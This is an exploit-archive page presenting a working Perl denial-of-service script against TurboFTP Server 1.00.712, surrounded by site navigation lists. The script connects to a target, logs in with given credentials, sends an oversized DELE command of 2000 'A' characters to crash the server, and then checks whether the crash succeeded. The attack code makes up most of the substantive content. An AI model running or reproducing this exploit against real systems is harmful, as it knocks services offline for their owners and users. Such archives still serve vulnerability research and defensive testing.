TurboFTP Server 1.00.712 Denial Of Service

TurboFTP Server 1.00.712 Denial Of Service: Posted Jan 13, 2010; Authored by corelanc0d3r; TurboFTP server version 1.00.712 remote denial of service exploit.; tags | exploit, remote, denial of service; SHA-256 | 2f1046f88e7a2d9e5f7e2baad89094a92f1d3c70e7ee2f94e235d2bc85b8a9a1; Download | Favorite | View

TurboFTP Server 1.00.712 Denial Of Service

# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 december 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                       |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket; 

if ($#ARGV ne 3) { 
print "\n  usage: $0 <targetip> <targetport> <user> <password>\n"; 
exit(0); 
} 

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 

$ftp = <$sock> || die " [!] *** Unable to connect ***\n"; 
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $pass\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print "   ** $ftp2\n";

Top Authors In Last 30 Days

Red Hat 243 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 63 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
Gentoo 33 files
H D Moore 31 files
Debian 29 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,114)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,006)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,685)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,797)
UNIX (9,443)
UnixWare (187)
Windows (6,757)
Other

TurboFTP Server 1.00.712 Denial Of Service

TurboFTP Server 1.00.712 Denial Of Service

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

TurboFTP Server 1.00.712 Denial Of Service

Share This

TurboFTP Server 1.00.712 Denial Of Service

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems